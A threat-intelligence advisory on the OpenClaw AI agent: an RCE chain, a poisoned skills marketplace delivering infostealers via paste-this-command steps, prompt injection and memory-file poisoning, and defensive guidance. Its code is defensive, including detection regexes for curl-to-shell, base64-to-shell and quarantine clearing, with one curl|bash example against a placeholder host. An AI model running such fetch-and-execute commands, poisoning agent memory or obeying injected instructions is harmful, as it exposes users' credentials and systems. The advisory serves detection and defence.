The OpenClaw security crisis

How the open-source AI agent OpenClaw became a multi-vector enterprise threat in under three weeks.

David Kasabji

Head of Threat Intelligence

OpenClaw is an open-source, self-hosted AI agent framework that achieved viral adoption in late January 2026, crossing 180,000 GitHub stars and drawing over two million visitors in a single week. Originally launched as Clawdbot by Austrian developer Peter Steinberger in November 2025, it was rebranded twice following trademark pressure from Anthropic before settling on its current name. On 14 February 2026, Steinberger announced he was joining OpenAI to lead personal agent development, with the OpenClaw project transitioning to an independent, OpenAI-sponsored foundation.

The tool’s appeal is straightforward: it gives users a persistent AI assistant that runs locally, interfaces through familiar messaging platforms (WhatsApp, Telegram, Slack, Discord), and can autonomously execute real-world tasks — managing email, running terminal commands, browsing the web, and controlling connected services.

That same autonomy makes it a high-value target. These types of autonomous AI agents introduce significant AI security risks when deployed without governance. Within three weeks of its surge in popularity, OpenClaw became the focal point of a multi-vector security crisis involving a critical remote code execution vulnerability (CVE-2026-25253), a large-scale supply-chain poisoning campaign in its skills marketplace, and systemic architectural weaknesses that amplify the impact of both.

Key findings at a glance

  • CVE-2026-25253 (CVSS 8.8): A one-click RCE chain exploitable even against localhost-bound instances, patched in v2026.1.29.
  • ClawHavoc campaign: 341 malicious skills discovered in ClawHub (12% of the registry), primarily delivering Atomic macOS Stealer (AMOS). Updated scans now report over 800 malicious skills (~20% of registry).
  • 30,000+ internet-exposed instances identified by multiple scanning teams (Censys, Bitsight, Hunt.io), many running without authentication.
  • Enterprise spillover confirmed: Bitdefender GravityZone telemetry documents OpenClaw deployments on corporate endpoints, constituting a new form of Shadow AI with elevated system privileges.
  • Architectural risk: Credentials stored in plaintext files, no origin validation on WebSocket connections, and an open marketplace model with minimal vetting create structural exposure.

This advisory provides a comprehensive analysis of the AI security threat landscape surrounding OpenClaw, contextualises the risk for enterprise environments, and offers actionable detection and containment guidance. Indicators of Compromise and detection queries are provided in the technical appendices.

Understanding OpenClaw

At its core, OpenClaw is an agentic interface layer. It connects to an external large language model — typically Anthropic’s Claude, OpenAI’s GPT, or DeepSeek — and wraps it in a persistent execution environment with broad system access. The user communicates with the agent through messaging apps, and the agent acts: executing shell commands, reading and modifying files, sending emails, scheduling tasks, browsing the web, and managing OAuth-connected services. It stores long-term memory and context across sessions, meaning it learns and adapts over time.

The architecture follows a gateway-plus-control-UI model. The gateway handles communication with the LLM and executes tasks on the host system, while the Control UI provides a browser-based management panel typically served on TCP port 18789. Functionality is extended through skills — modular packages published to ClawHub, a community marketplace with an experience similar to npm or a browser extension store. At the time of the initial security audits, ClawHub hosted approximately 2,857 skills; that number has since grown past 10,700.

The design philosophy prioritises capability and convenience. Full disk access, terminal permissions, and OAuth tokens are routinely granted to make the agent functional. As one of OpenClaw’s own maintainers put it in the project’s Discord: “If you can’t understand how to run a command line, this is far too dangerous of a project for you to use safely.” This candid assessment captures the tension at the heart of the project — and the reason it has become a security concern.

Threat stream 1: CVE-2026-25253 — one-click remote code execution

The most acute technical risk emerged with the disclosure of CVE-2026-25253, a vulnerability classified under CWE-669 (Incorrect Resource Transfer Between Spheres) and rated CVSS 8.8. The flaw was discovered by Mav Levin of the depthfirst research team and patched in OpenClaw version 2026.1.29, released on 30 January 2026. On the same day, the project issued three high-impact security advisories: one for this RCE chain and two additional command injection vulnerabilities.

The attack chain

The vulnerability exploits a design flaw in the Control UI’s handling of the gatewayUrl query parameter. Prior to the patch, the UI accepted this parameter from the URL without validation and automatically initiated a WebSocket connection to the specified address, transmitting the user’s authentication token as part of the handshake.

This created a three-stage attack chain that researchers describe as completing in milliseconds:

  • Stage 1 — Token exfiltration. A victim clicks a crafted link or visits a malicious page. The link includes a manipulated gatewayUrl parameter pointing to attacker-controlled infrastructure. The Control UI immediately establishes a WebSocket connection and sends the stored authentication token to the attacker.
  • Stage 2 — Cross-Site WebSocket Hijacking. Because the OpenClaw WebSocket server did not validate the Origin header, the attacker’s JavaScript could connect to the victim’s local gateway instance (e.g., ws://localhost:18789) from a malicious web page. The victim’s browser becomes the bridge into the local network.
  • Stage 3 — Gateway takeover and code execution. With the stolen token, the attacker gains operator-level access to the gateway API. This allows modifying configuration (including sandbox settings and tool policies), invoking privileged actions, and executing arbitrary commands on the host system with whatever permissions the agent has been granted.
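The two checks that were missing in the chain above, validating where the UI is told to connect and validating which origins may open a WebSocket to the gateway, can be sketched as follows. This is a minimal illustration under stated assumptions, not OpenClaw's actual patch: the allowlists and the function names `is_safe_gateway_url` and `is_allowed_origin` are hypothetical.

```python
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical allowlists; a real deployment would derive these from its own configuration.
ALLOWED_GATEWAY_HOSTS = {"localhost", "127.0.0.1"}
ALLOWED_ORIGINS = {"http://localhost:18789", "http://127.0.0.1:18789"}


def is_safe_gateway_url(raw_url: str) -> bool:
    """Accept only ws/wss URLs whose host is on the allowlist."""
    try:
        parts = urlsplit(raw_url)
    except ValueError:
        return False  # malformed URL, for example an unterminated IPv6 literal
    if parts.scheme not in {"ws", "wss"}:
        return False
    # hostname ignores any "user@" prefix, so "ws://localhost@evil.example" is rejected
    return parts.hostname in ALLOWED_GATEWAY_HOSTS


def is_allowed_origin(origin_header: Optional[str]) -> bool:
    """Reject WebSocket handshakes whose Origin header is missing or not allowlisted."""
    if not origin_header:
        return False
    return origin_header.rstrip("/") in ALLOWED_ORIGINS
```

Either check alone would break one stage of the chain: the first stops the token being sent to attacker infrastructure, the second stops a malicious page from bridging into the local gateway.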

Why “localhost-only” is not a defence

A common misconception is that binding OpenClaw to the loopback interface provides adequate protection. It does not. The exploit pivots through the victim’s browser, meaning the gateway does not need to be internet-facing to be compromised. Any user who has authenticated to the Control UI and subsequently visits a malicious page or clicks a crafted link is at risk.

Internet exposure compounds the risk

While CVE-2026-25253 is exploitable against local instances, the scale of internet-exposed OpenClaw deployments dramatically amplifies the attack surface.

Censys tracked growth from approximately 1,000 to over 21,000 publicly exposed instances between 25 and 31 January 2026. Bitsight observed more than 30,000 instances across a broader analysis window. An independent study by security researcher Maor Dayan identified 42,665 exposed instances, of which 5,194 were actively verified as vulnerable — with 93.4% exhibiting authentication bypass conditions.

The exposure is geographically distributed across 52 countries. The United States and China host the largest concentrations, followed by Singapore. The majority of deployments (98.6%) run on cloud or hosting infrastructure, primarily DigitalOcean, Alibaba Cloud, and Tencent. Many operators use reverse proxies (Nginx, Caddy) or Cloudflare Tunnels to enable remote access, but misconfiguration of these intermediaries frequently negates their protective value — all connections appear to originate from 127.0.0.1, bypassing OpenClaw’s localhost trust model.
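The reverse-proxy problem described above comes down to trusting the peer address of a connection. A rough sketch of a more conservative decision is shown below; the function name `is_trusted_local` and the header list are assumptions made for illustration and do not reflect OpenClaw's own code.

```python
import ipaddress
from typing import Mapping

# Headers that common reverse proxies add when relaying a request.
FORWARDING_HEADERS = ("x-forwarded-for", "x-real-ip", "forwarded")


def is_trusted_local(peer_ip: str, headers: Mapping[str, str]) -> bool:
    """Treat a request as local only if it comes from loopback AND shows no sign of proxying."""
    try:
        peer = ipaddress.ip_address(peer_ip)
    except ValueError:
        return False
    if not peer.is_loopback:
        return False
    present = {name.lower() for name in headers}
    # A loopback peer carrying forwarding headers is a proxy relaying someone else's request.
    return not any(header in present for header in FORWARDING_HEADERS)
```

A proxy that adds no forwarding headers would still pass this check, so it is a mitigation rather than a fix. The safer design is to require authentication regardless of source address.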

Honeypot data from Terrace Networks confirms that exploitation scanning began within hours of the initial public announcement on Hacker News on 26 January, with a smooth and sustained rise in scanning sources — indicating broad, automated bot activity rather than a small, focused campaign.

Threat stream 2: ClawHavoc — supply-chain poisoning at scale

Running in parallel to the vulnerability disclosure was a supply-chain attack of considerable scope. Koi Security researcher Oren Yomtov, working alongside an OpenClaw bot configured for threat analysis, audited all 2,857 skills available on ClawHub at the time of investigation and identified 341 malicious entries. Of those, 335 were traced to a single coordinated operation now tracked as ClawHavoc. As of the most recent scan (16 February 2026), the number of confirmed malicious skills has grown to over 824 across an expanded registry of 10,700+ skills. Bitdefender’s independent analysis places the figure even higher, at approximately 900 malicious packages, representing roughly 20% of the total ecosystem.

The social engineering mechanism

The ClawHavoc campaign is notable not for its technical sophistication but for its operational discipline and effective social engineering. The malicious skills were carefully disguised as high-demand tools across categories designed to attract both individual enthusiasts and professionals: cryptocurrency wallets and trackers (111 skills), YouTube utilities (57), prediction market bots (34), finance and social media tools (51), auto-updaters (28), and Google Workspace integrations (17). Extensive typosquatting was employed, with variations such as clawhub, clawhub1, clawhubb, and dozens more.
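Typosquatted names of this kind can often be surfaced with a simple edit-distance check. The sketch below is one possible approach, not a method attributed to any of the researchers cited here; the function names, the protected-name list, and the distance threshold of 2 are all assumptions.

```python
def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, computed one row at a time."""
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, start=1):
        current = [i]
        for j, char_b in enumerate(b, start=1):
            cost = 0 if char_a == char_b else 1
            current.append(min(previous[j] + 1,          # deletion
                               current[j - 1] + 1,       # insertion
                               previous[j - 1] + cost))  # substitution
        previous = current
    return previous[-1]


def likely_typosquats(candidates, protected, max_distance=2):
    """Return (candidate, protected_name) pairs that are close but not identical."""
    flagged = []
    for name in candidates:
        lowered = name.lower()
        for target in protected:
            if lowered != target and edit_distance(lowered, target) <= max_distance:
                flagged.append((name, target))
                break
    return flagged
```

For example, `likely_typosquats(["clawhub1", "clawhubb", "weather-tool"], ["clawhub"])` flags the first two names and ignores the third. Short names produce false positives at this threshold, so the output is a review queue rather than a blocklist.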

Each malicious skill featured professional-looking documentation with a Prerequisites section. This section instructed users to install an additional component — typically by executing a shell command retrieved from a code-sharing site or downloading a password-protected ZIP file. The approach follows what the broader threat landscape has been calling the ClickFix pattern: convincing users to paste attacker-supplied commands into their own terminal, thereby executing malicious code in the most trusted context possible.

Payload analysis

The primary payload for macOS targets was Atomic macOS Stealer (AMOS), a commodity infostealer available as malware-as-a-service on Telegram for approximately $500–1,000 per month. The AMOS variant deployed in this campaign exhibited advanced evasion techniques including XOR-encrypted payloads, AppleScript-based credential prompting that mimics native macOS dialogs, and LaunchAgent-based persistence. AMOS is capable of harvesting iCloud Keychain passwords, browser cookies and session tokens, cryptocurrency wallet data (targeting over 60 wallet types including MetaMask, Exodus, and Ledger Live), SSH keys, Telegram session files, and files from common user directories.

Windows targets received a different payload: a VMProtect-packed infostealer distributed through password-protected ZIP files, coupled with keylogger and Remote Access Trojan (RAT) capabilities.

The campaign infrastructure was centralised. All 335 AMOS-delivering skills shared a single command-and-control IP address, with payload staging leveraging legitimate code-sharing platforms for initial distribution. A small number of outlier skills (6 of the original 341) employed different techniques, including reverse shell backdoors embedded in otherwise functional code and credential exfiltration from OpenClaw’s configuration files via webhook services.

Memory poisoning: a novel dimension

One of the more concerning aspects of the campaign was the targeting of OpenClaw’s persistent memory files (SOUL.md and MEMORY.md). Because OpenClaw retains long-term context and behavioural instructions in these files, manipulating them can permanently alter the agent’s behaviour. As Snyk’s analysis noted, this transforms point-in-time exploits into stateful, delayed-execution attacks — a malicious payload no longer needs to trigger immediately on delivery; it can modify the agent’s instructions and wait.
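One way to notice tampering with these files is to keep a hash baseline and compare against it periodically. The following is a minimal sketch; where the files live is not stated here, so the directory is passed in as a parameter, and the function names `snapshot` and `changed_files` are hypothetical.

```python
import hashlib
from pathlib import Path

MEMORY_FILES = ("SOUL.md", "MEMORY.md")


def snapshot(directory: Path) -> dict:
    """Return {filename: SHA-256 hex digest} for the memory files that exist."""
    digests = {}
    for name in MEMORY_FILES:
        path = directory / name
        if path.is_file():
            digests[name] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def changed_files(baseline: dict, current: dict) -> list:
    """List files that were added, removed, or modified since the baseline."""
    names = sorted(set(baseline) | set(current))
    return [name for name in names if baseline.get(name) != current.get(name)]
```

Because the agent legitimately rewrites its own memory, a changed hash is a prompt for human review of the diff, not proof of compromise.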

The marketplace barrier to entry

At the time of the ClawHavoc campaign, the only requirement to publish a skill on ClawHub was a GitHub account at least one week old. There was no automated static analysis, no code review, no signing requirement. A single ClawHub user (“hightower6eu”) uploaded 354 malicious packages in what appears to have been an automated blitz. OpenClaw has since partnered with VirusTotal to scan uploaded skills, but the fundamental marketplace trust problem remains.

Threat stream 3: architectural security debt

Beyond the specific vulnerability and the supply-chain campaign, OpenClaw exposes systemic design risks that are common to agentic AI systems but rarely seen at this scale. Security researcher Simon Willison has described the convergence of three properties as the “lethal trifecta” for AI agents: access to private data, exposure to untrusted content, and the ability to communicate externally. OpenClaw exhibits all three by design. Palo Alto Networks mapped OpenClaw to every category in the OWASP Top 10 for Agentic Applications.

Credential storage

Multiple researchers have documented that OpenClaw stores API keys, OAuth tokens, and other sensitive material in plaintext Markdown and JSON files within local directories (~/.openclaw/, and legacy paths such as ~/.clawdbot/). These files are attractive targets for commodity infostealers (AMOS, RedLine, Lumma, Vidar) and post-compromise credential harvesting scripts. In exposed instances, researcher Jamieson O’Reilly of Dvuln demonstrated access to Anthropic API keys, Telegram bot tokens, Slack credentials, and complete chat histories.
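A quick audit for this condition might look like the sketch below, which walks a directory, flags Markdown and JSON files that mention secret-like key names, and notes whether other local users can read them. The keyword pattern and the function name `find_plaintext_secrets` are assumptions, and the permission check is only meaningful on POSIX systems.

```python
import re
import stat
from pathlib import Path

# Heuristic only: matches key names, not actual secret values.
SECRET_HINT = re.compile(r"(api[_-]?key|token|secret|password)", re.IGNORECASE)
TEXT_SUFFIXES = {".md", ".json"}


def find_plaintext_secrets(root: Path) -> list:
    """Return (path, readable_by_others) for files that appear to hold secrets."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in TEXT_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        if SECRET_HINT.search(text):
            mode = stat.S_IMODE(path.stat().st_mode)
            readable_by_others = bool(mode & (stat.S_IRGRP | stat.S_IROTH))
            findings.append((path, readable_by_others))
    return findings
```

It could be pointed at a directory such as `Path.home() / ".openclaw"`. Tight file permissions do not stop an infostealer running as the same user, so the result is best read as an inventory of what needs rotating.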

Prompt injection

OpenClaw processes content from inherently untrusted sources — incoming emails, web pages, documents, messages from unknown contacts. Hidden instructions embedded in this content can manipulate the underlying language model into performing unintended actions: exfiltrating data, executing commands, or modifying the agent’s own configuration. Cisco’s assessment demonstrated a malicious skill performing silent data exfiltration via embedded curl commands, with the agent executing network calls without user awareness. Kaspersky’s analysis identified 512 vulnerabilities in a single security audit, eight of which were classified as critical.

Detection evasion by design

Agent-driven activity is structurally difficult to detect with traditional security tooling. An agent sending an email uses the same endpoints and protocols as the legitimate user. EDR sees normal HTTP 200 responses. Network monitoring sees traffic to sanctioned services. The payload is natural language, not recognisable malicious code. This makes AI agent activity a form of semantic-level evasion — the malicious behaviour is encoded in meaning, not in binary patterns or known signatures.

Enterprise impact: the shadow agent problem

OpenClaw is marketed as a personal productivity tool. However, the boundary between personal and corporate use dissolves the moment an employee connects the agent to Slack, corporate email, Google Workspace, or any SaaS platform using their work credentials. This is not hypothetical. Bitdefender’s GravityZone telemetry has documented OpenClaw deployments on corporate endpoints, confirming that employees are installing and running AI agents with broad system access on enterprise-managed and BYOD devices without security team awareness or approval.

The pattern mirrors classic Shadow IT but with a critical amplification: unlike a rogue SaaS subscription, a compromised AI agent inherits real user permissions, operates continuously, and acts autonomously. It does not require repeated human interaction to maintain access. A compromised agent can read Slack messages, access cloud-stored documents, send emails, and exfiltrate data through normal application channels — all while appearing as legitimate user activity.

Steinberger’s move to OpenAI and the project’s transition to a foundation structure may actually increase enterprise exposure in the near term. The association with OpenAI lends perceived legitimacy (“it’s supported now”), potentially accelerating adoption pressure while the fundamental security architecture remains unchanged. Organisations without clear policy and enforcement mechanisms for autonomous agent tools risk a growing population of unmanaged, highly privileged AI agents operating inside their security perimeter.

Additionally, the Moltbook platform, a social network for AI agents launched alongside the OpenClaw ecosystem, suffered a data exposure incident in which its Supabase backend leaked approximately 35,000 email addresses and 1.5 million agent tokens. For users who connected Moltbook with corporate-linked credentials, this exposure extends the blast radius further.

Defensive recommendations

Discovery and inventory

The first priority is visibility. Security teams should assume that OpenClaw deployments exist within their environment and actively search for them rather than waiting for incident triggers.

  • Host-based indicators: Search for directories such as ~/.openclaw/ and legacy paths (~/.clawdbot/, ~/.moltbot/). Look for processes or binaries containing openclaw, clawdbot, or moltbot in process listings, scheduled tasks, login items, and LaunchAgents. Audit Node.js processes that may correspond to the OpenClaw runtime.
  • Network-based indicators: Scan internal and external IP ranges for services on TCP port 18789 (the default) as well as common web ports (80, 443) that may front reverse-proxied instances. Look for characteristic HTML title strings (OpenClaw Control, Moltbot Control, Clawdbot Control) in HTTP responses. Monitor for unexpected WebSocket connections from browser processes to non-localhost endpoints, particularly following user click events.
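The host and network indicators above can be turned into a small discovery helper. The sketch below uses only the directory names, port, and title strings listed in this section; the function names are hypothetical, and any scanning should be limited to ranges you are authorised to test.

```python
import re
import socket
from pathlib import Path

CANDIDATE_DIRS = (".openclaw", ".clawdbot", ".moltbot")
KNOWN_TITLES = ("OpenClaw Control", "Moltbot Control", "Clawdbot Control")
DEFAULT_PORT = 18789
TITLE_RE = re.compile(r"<title[^>]*>(.*?)</title>", re.IGNORECASE | re.DOTALL)


def find_agent_dirs(home: Path) -> list:
    """Return the agent data directories that exist under a user's home directory."""
    return [home / name for name in CANDIDATE_DIRS if (home / name).is_dir()]


def port_is_open(host: str, port: int = DEFAULT_PORT, timeout: float = 1.0) -> bool:
    """Attempt a TCP connection; True means something is listening."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def has_known_title(html: str) -> bool:
    """Check an HTTP response body for one of the characteristic page titles."""
    match = TITLE_RE.search(html)
    if not match:
        return False
    title = match.group(1).lower()
    return any(known.lower() in title for known in KNOWN_TITLES)
```

An open port alone is weak evidence. Combining it with a title match or a host-side directory hit gives a much more reliable signal.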

Containment and hardening

Where OpenClaw deployments are discovered, apply a risk-based triage. Instances connected to corporate services or holding credentials for enterprise systems should be treated as high-priority.

  • Patch immediately. Ensure all instances are running version 2026.1.29 or later. Versions prior to this release are confirmed vulnerable to CVE-2026-25253.
  • Enforce least privilege. Restrict filesystem scope, disable broad terminal permissions, and remove unnecessary OAuth scopes. If the organisation approves continued use, require deployment in isolated environments — dedicated VMs, containers, or sandboxed user accounts with limited access.
  • Audit connected services. Review OAuth grants, API keys, and token permissions for any services connected to the agent. Treat these as always-on access brokers and reduce scopes to the minimum required.
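When checking versions in bulk, compare them numerically rather than as strings, since a plain string comparison would rank 2026.1.3 above 2026.1.29. A minimal sketch, assuming version strings are purely numeric and dot-separated with an optional leading "v" (the function names are hypothetical):

```python
PATCHED = (2026, 1, 29)  # first release that fixes CVE-2026-25253


def parse_version(text: str) -> tuple:
    """Turn '2026.1.29' or 'v2026.1.29' into (2026, 1, 29)."""
    return tuple(int(part) for part in text.strip().lstrip("vV").split("."))


def is_patched(version: str) -> bool:
    """True if the version is at or above the patched release."""
    return parse_version(version) >= PATCHED
```

Version strings with non-numeric suffixes would raise `ValueError` here, which is a reasonable cue to inspect that instance by hand.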

Monitoring and detection

Prioritise behavioural detection over static signatures. The nature of agent-based threats means that malicious activity often uses legitimate channels and protocols.

  • Terminal execution patterns: Alert on base64 decode-to-shell execution chains, curl | bash patterns, and use of xattr -c on recently downloaded executables (a macOS technique for clearing quarantine attributes before execution).
  • Network indicators: Monitor traffic to known ClawHavoc campaign infrastructure (see Appendix A). Detect DNS lookups and HTTP connections to script-staging sites followed by terminal execution on the same host.
  • Identity and access telemetry: Watch for OAuth application consent spikes, unusual token refresh patterns, and SaaS access from non-standard devices or locations that may indicate agent-mediated access from home lab or personal endpoints.
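The terminal execution patterns listed above can be approximated with a few regular expressions applied to process command lines. This is a rough sketch, not a production detection rule: the rule names and the `classify` function are hypothetical, and obfuscated commands will evade patterns this simple.

```python
import re

SHELL = r"(?:sudo\s+)?(?:ba|z|da)?sh\b"

RULES = {
    # curl or wget output piped straight into a shell
    "download-piped-to-shell": re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*" + SHELL),
    # base64 decoding piped into a shell
    "base64-decode-to-shell": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*" + SHELL),
    # xattr -c, including clustered forms such as -cr
    "quarantine-cleared": re.compile(r"\bxattr\s+-\w*c\w*\b"),
}


def classify(command_line: str) -> list:
    """Return the names of all rules that match a command line."""
    return [name for name, pattern in RULES.items() if pattern.search(command_line)]
```

For instance, `classify("curl -fsSL https://example.invalid/install.sh | bash")` returns `["download-piped-to-shell"]`, while an ordinary pipeline such as `ls -la | sort` returns an empty list.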

Policy: establishing governance for autonomous agents

The most durable defence is organisational policy that treats autonomous AI agents as a distinct technology category requiring specific governance.

  • No autonomous agents on corporate devices without security review. This includes personal devices used for work (BYOD) where corporate credentials are accessible.
  • Approved agents must run in isolation. VM, container, or dedicated host deployment with network segmentation from corporate identity providers and data stores.
  • Skills and extensions treated as third-party code. Require scanning and review before installation. Cisco has released an open-source Skill Scanner tool that combines static analysis, behavioural dataflow analysis, LLM semantic analysis, and VirusTotal scanning.
  • Periodic credential hygiene. Scheduled review and rotation of tokens, API keys, and OAuth grants connected to any agent tooling.

Incident response: if you discover OpenClaw in your environment

Immediate containment

Isolate the affected host from the network. Stop all OpenClaw processes and services. Block the host from reaching identity providers and key SaaS platforms until triage is complete. If the instance was internet-exposed, treat the host as potentially compromised regardless of whether specific exploitation indicators are found.

Forensic triage

Preserve the ~/.openclaw/ and legacy (~/.clawdbot/) directories for analysis. Review installed skills and their setup instructions — compare against published ClawHavoc skill lists and IOCs. Examine the SOUL.md and MEMORY.md files for signs of memory poisoning. Validate whether infostealer indicators are present: browser data access artifacts, Keychain access on macOS, cryptocurrency wallet file reads, and Telegram session file access.

Credential response

Rotate all API keys and tokens that were accessible to the agent. Reset impacted user credentials and revoke active sessions. Treat all OAuth grants connected to the agent as potentially compromised until validated. For instances where AMOS or similar stealer malware is confirmed, the credential rotation scope should include browser-stored passwords, SSH keys, and any cryptocurrency wallet credentials.

The broader lesson: agents change the security model

OpenClaw is not an isolated incident. It is an early and instructive case study in a broader shift that will define the security landscape for the foreseeable future. Several patterns observed here will recur as autonomous agent adoption accelerates.

  • Marketplaces become the product’s attack surface. Every extensible platform creates a supply-chain exposure proportional to the trust its users place in community-contributed code. The npm ecosystem learned this lesson over years; ClawHub compressed the same learning curve into weeks.
  • Social engineering moves into developer and power-user workflows. The ClickFix pattern — convincing users to execute attacker-supplied commands in their own terminal — exploits a trust relationship between user and tool that traditional phishing awareness training does not address.
  • Traditional controls struggle when malicious behaviour looks like legitimate automation. Endpoint detection, network monitoring, and identity systems were designed for a world where malicious actions look different from normal operations. Agent-driven threats operate within the boundaries of authorised access, using expected protocols and legitimate endpoints.
  • Prompt injection and privilege requirements are structural problems, not edge cases. There is currently no foolproof defence against prompt injection in systems that process untrusted content. Combined with the broad permissions agents require to be useful, this creates a category of risk that cannot be patched away — it must be governed.

The security question for organisations is no longer whether autonomous agents will appear in their environments. It is whether discovery and governance will outpace adversarial exploitation. OpenClaw has provided the first large-scale demonstration of what happens when it does not.

About the author

David Kasabji

Head of Threat Intelligence

David Kasabji is the Head of Threat Intelligence at the Conscia Group. He leads the development and delivery of actionable intelligence across cyber defense and managed security operations, translating complex threat activity into clear outcomes for different audiences, from SOC analysts and incident responders to executive stakeholders and external communications. His work spans end-to-end intelligence operations: collection and analysis of adversary activity, threat actor and campaign profiling, IOC and TTP development, and intelligence-driven guidance for detection, threat hunting, and security prioritization. David is also actively involved in Digital Forensics and Incident Response, supporting investigations and crisis situations with rapid triage, context, and strategic recommendations. A strong focus of his role is continuously improving how intelligence is operationalized through standardization and automation to ensure it is timely, relevant, and measurable.
